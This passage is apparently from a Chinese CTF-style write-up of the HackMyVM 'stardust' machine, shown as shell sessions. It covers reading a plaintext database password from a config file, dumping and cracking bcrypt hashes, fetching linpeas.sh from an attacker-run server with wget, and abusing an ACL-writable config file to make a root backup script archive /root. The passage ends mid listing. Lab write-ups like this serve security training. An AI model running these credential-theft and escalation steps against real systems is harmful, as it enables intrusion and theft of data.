4096 May  6  2023 css\ndrwxr-xr-x  2 www-data www-data  4096 May  6  2023 css_compiled\ndrwxr-xr-x 16 www-data www-data  4096 May  6  2023 files\ndrwxr-xr-x  4 www-data www-data 36864 May  6  2023 front\ndrwxr-xr-x  2 www-data www-data  4096 May  6  2023 glpi\ndrwxr-xr-x  2 www-data www-data  4096 May  6  2023 inc\n-rwxr-xr-x  1 www-data www-data  6214 May  6  2023 index.php\ndrwxr-xr-x  4 www-data www-data  4096 May  6  2023 install\ndrwxr-xr-x  5 www-data www-data  4096 May  6  2023 js\ndrwxr-xr-x  3 www-data www-data  4096 May  6  2023 lib\ndrwxr-xr-x  2 www-data www-data  4096 May  6  2023 locales\ndrwxr-xr-x  2 www-data www-data  4096 May  6  2023 marketplace\ndrwxr-xr-x 10 www-data www-data  4096 May  6  2023 pics\ndrwxr-xr-x  2 www-data www-data  4096 May  6  2023 plugins\ndrwxr-xr-x  3 www-data www-data  4096 May  6  2023 public\ndrwxr-xr-x  3 www-data www-data  4096 May  6  2023 resources\ndrwxr-xr-x  2 www-data www-data  4096 May  6  2023 sound\ndrwxr-xr-x 24 www-data www-data 32768 May  6  2023 src\n-rwxr-xr-x  1 www-data www-data  2476 May  6  2023 status.php\ndrwxr-xr-x  8 www-data www-data  4096 May  6  2023 templates\ndrwxr-xr-x 39 www-data www-data  4096 May  6  2023 vendor\ndrwxr-xr-x  2 www-data www-data  4096 May  6  2023 version\n(remote) www-data@stardust.hmv:\/var\/www\/html$ cd config\/\n(remote) www-data@stardust.hmv:\/var\/www\/html\/config$ ls -la\ntotal 20\ndrwxr-xr-x  2 www-data www-data 4096 May  6  2023 .\ndrwxr-xr-x 25 www-data www-data 4096 May  6  2023 ..\n-rwxr-xr-x  1 www-data www-data  115 May  6  2023 .htaccess\n-rw-r--r--  1 www-data www-data  302 May  6  2023 config_db.php\n-rw-r--r--  1 www-data www-data   32 May  6  2023 glpicrypt.key\n(remote) www-data@stardust.hmv:\/var\/www\/html\/config$ cat config_db.php \n&lt;?php\nclass DB extends DBmysql {\n   public $dbhost = &#039;localhost&#039;;\n   public $dbuser = &#039;glpi&#039;;\n   public $dbpassword = &#039;D6jsxBGekO&#039;;\n   public $dbdefault = &#039;glpi&#039;;\n   public $use_utf8mb4 = true;\n   public $allow_myisam = false;\n   public $allow_datetime = false;\n   public $allow_signed_keys = false;\n}<\/code><\/pre>\n<h3>\u8bfb\u53d6\u6570\u636e\u5e93<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@stardust.hmv:\/var\/www\/html\/config$ mysql -u glpi -p\nEnter password: \nWelcome to the MariaDB monitor.  Commands end with ; or \\g.\nYour MariaDB connection id is 729\nServer version: 10.5.19-MariaDB-0+deb11u2 Debian 11\n\nCopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.\n\nType &#039;help;&#039; or &#039;\\h&#039; for help. Type &#039;\\c&#039; to clear the current input statement.\n\nMariaDB [(none)]&gt; show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| glpi               |\n| information_schema |\n| intranetikDB       |\n+--------------------+\n3 rows in set (0.017 sec)\n\nMariaDB [(none)]&gt; use intranetikDB;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nMariaDB [intranetikDB]&gt; show tables;\n+------------------------+\n| Tables_in_intranetikDB |\n+------------------------+\n| users                  |\n+------------------------+\n1 row in set (0.000 sec)\n\nMariaDB [intranetikDB]&gt; select * from users;\n+----+-----------+--------------------------------------------------------------+\n| id | username  | password                                                     |\n+----+-----------+--------------------------------------------------------------+\n|  1 | carolynn  | $2b$12$HRVJrlSG5eSW44VaNlTwoOwu42c1l9AnbpOhDvcEXVMyhcB46ZtXC |\n|  2 | chi-yin   | $2b$12$.sDM7vxQCe3nmOois5Ho4O1HkNEiz4UJ\/9XEsYlnbH7Awlxfig3g2 |\n|  3 | tally     | $2b$12$zzVJjW1Bvm4WqcPy6nqDFOU4JRh2mMpbeKKbP21cn7FKtNy4Ycjl. |\n|  4 | jeraldine | $2b$12$gjwlFI7f1QABeZ5jKlbTh.L00oIBXxHOUH.Gah.SXnX4PPrLd0mI6 |\n|  5 | ishmael   | $2b$12$eEeCfKVkmFCvXjubRp.GhOKNTz0JoVXoKYCM3\/kylN8AMzoDVEoWC |\n|  6 | hetty     | $2b$12$uu719jU2sXy.blBj2QEPR.7mg2UbVfL5eX9KM4aXV5rigHWjFGNvO |\n|  7 | yvan      | $2b$12$QJZj2WvvQU6c2GjpmW\/Z9O0Ggudv5hhrREfqfJK7jjDWAa7.GoTM. |\n|  8 | nong      | $2b$12$JWqnC1emWOLZszg1bWX3her2xFp47ZLE5MEd0YitoUDbVHH6lBPHW |\n|  9 | ande      | $2b$12$03pXHnhLpgaGfeY72FtwJ.1T5IgCxHF.1PrPUVFySI4fIV3Gnykvq |\n| 10 | colleen   | $2b$12$ZwPxWr9.g5VoiFQfWUJtgeTuNcpzpD44BrOVRafrnXHIa3Pc9mK1C |\n| 11 | gussi     | $2b$12$f\/05LxKgsAt6KNJ676sG\/.90OvOMyUxuP2OdtZ9d8AnSmhP8ZIIA2 |\n| 12 | brandi    | $2b$12$wQKGmPPRclBk4KpT3e44q.EOIh.xki.70W62xDuPnybXKYeXOSd2u |\n| 13 | karrie    | $2b$12$bZVRUGzKjDGqOGKzWgcWUehPiwBseDScXfmsTZJb.r58Uc5uxFFUC |\n| 14 | maala     | $2b$12$D0kAwa0fGU055rUnPJHMLuuB0fHcGjKbjLw9oNi\/IMFkbzP980fvS |\n| 15 | brittany  | $2b$12$hgjI3XifZTqfMCSM4TOqTObHNLNvkT0FhwiAJ7zr\/GGLM58b4ieVC |\n+----+-----------+--------------------------------------------------------------+\n15 rows in set (0.000 sec)\n\nMariaDB [intranetikDB]&gt; exit\nBye<\/code><\/pre>\n<p>nice\uff01\uff01\uff01\uff01<\/p>\n<h3>\u5c1d\u8bd5\u7206\u7834<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@stardust.hmv:\/var\/www\/html\/config$ cat \/etc\/passwd | grep &quot;bash&quot;\nroot:x:0:0:root:\/root:\/bin\/bash\ntally:x:1000:1000:,,,:\/home\/tally:\/bin\/bash<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/stardust]\n\u2514\u2500$ vim hash    \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/stardust]\n\u2514\u2500$ john hash -w=\/usr\/share\/wordlists\/rockyou.txt\nUsing default input encoding: UTF-8\nLoaded 1 password hash (bcrypt [Blowfish 32\/64 X3])\nCost 1 (iteration count) is 4096 for all loaded hashes\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nbonita           (?)     \n1g 0:00:00:16 DONE (2024-04-28 10:01) 0.06031g\/s 17.37p\/s 17.37c\/s 17.37C\/s 0123456789..brenda\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n<p>\u4f7f\u7528\u7206\u7834\u51fa\u6765\u7684\u7ed3\u679c\u5207\u6362\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@stardust.hmv:\/var\/www\/html\/config$ su -l tally\nPassword: \ntally@stardust:~$ ls -la\ntotal 32\ndrwxr-xr-x 4 tally tally 4096 May  8  2023 .\ndrwxr-xr-x 3 root  root  4096 May  6  2023 ..\nlrwxrwxrwx 1 root  root     9 May  6  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 tally tally  220 May  6  2023 .bash_logout\n-rw-r--r-- 1 tally tally 3526 May  6  2023 .bashrc\ndrwxr-xr-x 3 tally tally 4096 May  7  2023 .local\n-rw-r--r-- 1 tally tally  807 May  6  2023 .profile\ndrwx------ 2 tally tally 4096 May  8  2023 .ssh\n-rwx------ 1 tally tally   33 May  7  2023 user.txt\ntally@stardust:~$ cat user.txt \nf4c0971d361c2844bb9730846dc330c2<\/code><\/pre>\n<h3>\u5b9a\u65f6\u4efb\u52a1\u63d0\u6743<\/h3>\n<p>\u7ee7\u7eed\u4fe1\u606f\u641c\u96c6<\/p>\n<pre><code class=\"language-bash\">tally@stardust:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/mount\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\ntally@stardust:~$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep\ntally@stardust:~$ cd \/\ntally@stardust:\/$ ls\nbin   dev  home        initrd.img.old  lib32  libx32      media  opt   root  sbin  sys  usr  vmlinuz\nboot  etc  initrd.img  lib             lib64  lost+found  mnt    proc  run   srv   tmp  var  vmlinuz.old\ntally@stardust:\/$ cd tmp\ntally@stardust:\/tmp$ ls -la\ntotal 8\ndrwxrwxrwt  2 root root 4096 Apr 28 15:52 .\ndrwxr-xr-x 18 root root 4096 May  5  2023 ..\ntally@stardust:\/tmp$ cd ..\/opt\ntally@stardust:\/opt$ ls -la\ntotal 16\ndrwxr-xr-x+  2 root root 4096 May  8  2023 .\ndrwxr-xr-x  18 root root 4096 May  5  2023 ..\n-rw-rw-r--+  1 root root   49 May  8  2023 config.json\n-rwxr-xr-x   1 root root  607 May  7  2023 meteo\ntally@stardust:\/opt$ file meteo \nmeteo: Bourne-Again shell script, ASCII text executable\ntally@stardust:\/opt$ cat meteo \n#! \/bin\/bash\n\n#meteo\nconfig=&quot;\/opt\/config.json&quot;\nlatitude=$(jq &#039;.latitude&#039; $config)\nlongitude=$(jq &#039;.longitude&#039; $config)\nlimit=1000\n\n#sys\nweb=&quot;\/var\/www\/intranetik&quot;\nusers=&quot;\/home\/tally&quot;\nroot=&quot;\/root&quot;\ndest=&quot;\/var\/backups&quot;\n\n#get rain elevation \nelevation=$(curl -s &quot;https:\/\/api.open-meteo.com\/v1\/forecast?latitude=$latitude&amp;longitude=$longitude&amp;hourly=rain&quot; |jq .elevation)\n\nif [[ $elevation -gt $limit ]] ; then\necho &quot;RAIN ALERT !&quot;\ntar -cf $dest\/backup.tar $web &gt;\/dev\/null\ntar -rf $dest\/backup.tar $users &gt;\/dev\/null\ntar -rf $dest\/backup.tar $root &gt;\/dev\/null\necho &quot;BACKUP FINISHED&quot;\nelse\necho &quot;Weather is cool !&quot;\nfi\ntally@stardust:\/opt$ cat config.json \n{\n  &quot;latitude&quot;:  -18.48,\n  &quot;longitude&quot;: -70.33\n}<\/code><\/pre>\n<p>\u770b\u4e0a\u53bb\u50cf\u662f\u4e00\u4e2a\u5907\u4efd\u811a\u672c\uff0c\u5e94\u8be5\u662f\u4e00\u4e2a\u5b9a\u65f6\u4efb\u52a1\uff0c\u5927\u6982\u7c7b\u4f3c<code>\u4e0b\u96e8\u4e86\uff0c\u6536\u8863\u670d\u4e86<\/code>\u4e4b\u7c7b\uff0c\u5982\u679c\u8981\u4e0b\u96e8\u4e86\uff0c\u5c31\u81ea\u52a8\u5907\u4efd\u7528\u6237\u6587\u4ef6\uff0c\u4e0a\u4f20<code>linpeas.sh<\/code>\uff0c\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.0.175 - - [28\/Apr\/2024 11:40:07] &quot;GET \/linpeas.sh HTTP\/1.1&quot; 200 -<\/code><\/pre>\n<pre><code class=\"language-bash\">tally@stardust:\/opt$ cd \/tmp;wget http:\/\/192.168.0.143:8888\/linpeas.sh;chmod +x linpeas.sh\n--2024-04-28 17:40:09--  http:\/\/192.168.0.143:8888\/linpeas.sh\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 860549 (840K) [text\/x-sh]\nSaving to: \u2018linpeas.sh\u2019\n\nlinpeas.sh                            100%[=========================================================================&gt;] 840.38K  --.-KB\/s    in 0.06s   \n\n2024-04-28 17:40:09 (13.6 MB\/s) - \u2018linpeas.sh\u2019 saved [860549\/860549]<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016756.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016756.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240428234315619\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6ca1\u5565\u6536\u83b7\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016757.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016757.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240428234507481\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016758.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016758.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240428234606882\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u627e\u5230\u4e86\u51fa\u5904\uff0c\u968f\u4fbf\u7ffb\u7ffb\u53d1\u73b0\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016759.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016759.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240428235120341\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016760.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016760.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240428234945453\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016761.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016761.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429000338517\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f46\u662f\u95ee\u9898\u6765\u4e86\uff0c\u6211\u4eec\u6ca1\u6709\u5199\u5165\u6743\u9650\u3002\u3002\u3002\u3002\u770b\u5e08\u5085\u4eec\u7684blog\u53d1\u73b0\u8fd9\u91cc\u662f\u5177\u6709\u7279\u6b8a\u7684\u5199\u5165\u6743\u9650\u7684\u3002\u3002\u3002\u3002<\/p>\n<h3>ACL\u6743\u9650<\/h3>\n<blockquote>\n<p>ACL\u662fAccess Control List\u7684\u7f29\u5199\uff0c\u5b83\u4e3b\u8981\u63d0\u4f9b\u5728\u4f20\u7edf\u7684owner\u3001group\u3001others\u7684read\u3001write\u3001execute\u6743\u9650\u4e4b\u5916\u7684\u5c40\u90e8\u6743\u9650\u8bbe\u5b9a\u3002\u5177\u4f53\u6765\u8bf4\uff0cACL\u5141\u8bb8\u9488\u5bf9\u5355\u4e2a\u7528\u6237\u3001\u5355\u4e2a\u6587\u4ef6\u6216\u76ee\u5f55\u8fdb\u884cr\u3001w\u3001x\u7684\u6743\u9650\u8bbe\u5b9a\uff0c\u7279\u522b\u9002\u7528\u4e8e\u9700\u8981\u7279\u6b8a\u6743\u9650\u7684\u4f7f\u7528\u60c5\u51b5\u3002<\/p>\n<p>\u5728Linux\u4e2d\uff0cACL\u662f\u4e00\u79cd\u6743\u9650\u63a7\u5236\u673a\u5236\uff0c\u7528\u4e8e\u5728\u6587\u4ef6\u548c\u76ee\u5f55\u7ea7\u522b\u4e0a\u8bbe\u7f6e\u8bbf\u95ee\u63a7\u5236\u3002\u5b83\u63d0\u4f9b\u4e86\u4e00\u79cd\u66f4\u7075\u6d3b\u548c\u7cbe\u7ec6\u7684\u6743\u9650\u7ba1\u7406\u65b9\u5f0f\uff0c\u53ef\u4ee5\u9488\u5bf9\u4e0d\u540c\u7684\u7528\u6237\u3001\u7528\u6237\u7ec4\u6216\u7279\u5b9a\u7684\u6587\u4ef6\u8fdb\u884c\u8bbf\u95ee\u6743\u9650\u7684\u914d\u7f6e\u3002ACL\u6743\u9650\u53ef\u4ee5\u4e0e\u4f20\u7edf\u7684\u6587\u4ef6\u6743\u9650\u4e00\u8d77\u4f7f\u7528\uff0c\u5e76\u4e14\u53ef\u4ee5\u4ee5\u53e0\u52a0\u7684\u65b9\u5f0f\u5e94\u7528\u3002\u8fd9\u610f\u5473\u7740\u5728\u8bbe\u7f6eACL\u6743\u9650\u65f6\uff0c\u4f20\u7edf\u6587\u4ef6\u6743\u9650\u4ecd\u7136\u9002\u7528\uff0c\u5e76\u4e14\u53ef\u4ee5\u5728ACL\u6743\u9650\u7684\u57fa\u7840\u4e0a\u6dfb\u52a0\u6216\u8986\u76d6\u7279\u5b9a\u7684\u8bbf\u95ee\u63a7\u5236\u3002<\/p>\n<p>\u6df1\u5165\u4e86\u89e3\u4e00\u4e0b\u53ef\u4ee5\u53c2\u8003\uff1a<a href=\"https:\/\/zhuanlan.zhihu.com\/p\/453193962\">https:\/\/zhuanlan.zhihu.com\/p\/453193962<\/a><\/p>\n<\/blockquote>\n<p>\u4f7f\u7528<code>getfacl<\/code>\u8fdb\u884c\u67e5\u770b\uff1a<\/p>\n<pre><code class=\"language-bash\">tally@stardust:\/opt$ getfacl config.json \n# file: config.json\n# owner: root\n# group: root\nuser::rw-\nuser:tally:rw-\ngroup::r--\nmask::rw-\nother::r--\n\ntally@stardust:\/opt$ getfacl meteo \n# file: meteo\n# owner: root\n# group: root\nuser::rwx\ngroup::r-x\nother::r-x<\/code><\/pre>\n<p>\u6211\u4eec\u6709<code> config.json <\/code>\u7684\u5199\u5165\u6743\u9650\uff0c\u5c1d\u8bd5\u8fdb\u884c\u4fee\u6539\uff0c\u6328\u4e2a\u8bd5\u4e00\u4e0b\u4e0a\u9762\u51e0\u4e2a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016762.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016762.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429000538779\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5bc4\u3002\u3002\u3002\u3002\u7136\u540e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016763.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016763.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429001023139\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016764.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016764.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429001011895\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016765.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016765.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429001041479\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u867d\u7136\u6ca1\u80fd\u5907\u4efd\u6210\u529f\uff0c\u4f46\u662f\u6beb\u65e0\u7591\u95ee\uff0c\u662f\u5bf9\u7684\uff0c\u7b49\u5f85\u4e00\u4e0b\uff0c\u8ba9\u5b9a\u65f6\u4efb\u52a1\u8fd0\u884c\u5b8c\uff0c\u518d\u53bb\u770b\u770b\uff1a<\/p>\n<pre><code class=\"language-bash\">tally@stardust:~$ cd \/var\/backups\/\ntally@stardust:\/var\/backups$ ls -la\ntotal 1184\ndrwxr-xr-x  2 root root   4096 Apr 28 18:09 .\ndrwxr-xr-x 12 root root   4096 May  4  2023 ..\n-rw-r--r--  1 root root  40960 May  6  2023 alternatives.tar.0\n-rw-r--r--  1 root root   1906 May  5  2023 alternatives.tar.1.gz\n-rw-r--r--  1 root root   1772 May  4  2023 alternatives.tar.2.gz\n-rw-r--r--  1 root root   1658 Feb  6  2023 alternatives.tar.3.gz\n-rw-r--r--  1 root root  13464 May  6  2023 apt.extended_states.0\n-rw-r--r--  1 root root   1546 May  5  2023 apt.extended_states.1.gz\n-rw-r--r--  1 root root   1536 May  4  2023 apt.extended_states.2.gz\n-rw-r--r--  1 root root   1023 May  4  2023 apt.extended_states.3.gz\n-rw-r--r--  1 root root  51200 Apr 28 18:13 backup.tar\n-rw-r--r--  1 root root      0 May  8  2023 dpkg.arch.0\n-rw-r--r--  1 root root     32 May  7  2023 dpkg.arch.1.gz\n-rw-r--r--  1 root root     32 May  6  2023 dpkg.arch.2.gz\n-rw-r--r--  1 root root     32 May  5  2023 dpkg.arch.3.gz\n-rw-r--r--  1 root root     32 May  4  2023 dpkg.arch.4.gz\n-rw-r--r--  1 root root     32 Feb  6  2023 dpkg.arch.5.gz\n-rw-r--r--  1 root root    356 May  5  2023 dpkg.diversions.0\n-rw-r--r--  1 root root    168 May  5  2023 dpkg.diversions.1.gz\n-rw-r--r--  1 root root    168 May  5  2023 dpkg.diversions.2.gz\n-rw-r--r--  1 root root    126 Feb  6  2023 dpkg.diversions.3.gz\n-rw-r--r--  1 root root    126 Feb  6  2023 dpkg.diversions.4.gz\n-rw-r--r--  1 root root    126 Feb  6  2023 dpkg.diversions.5.gz\n-rw-r--r--  1 root root    172 May  4  2023 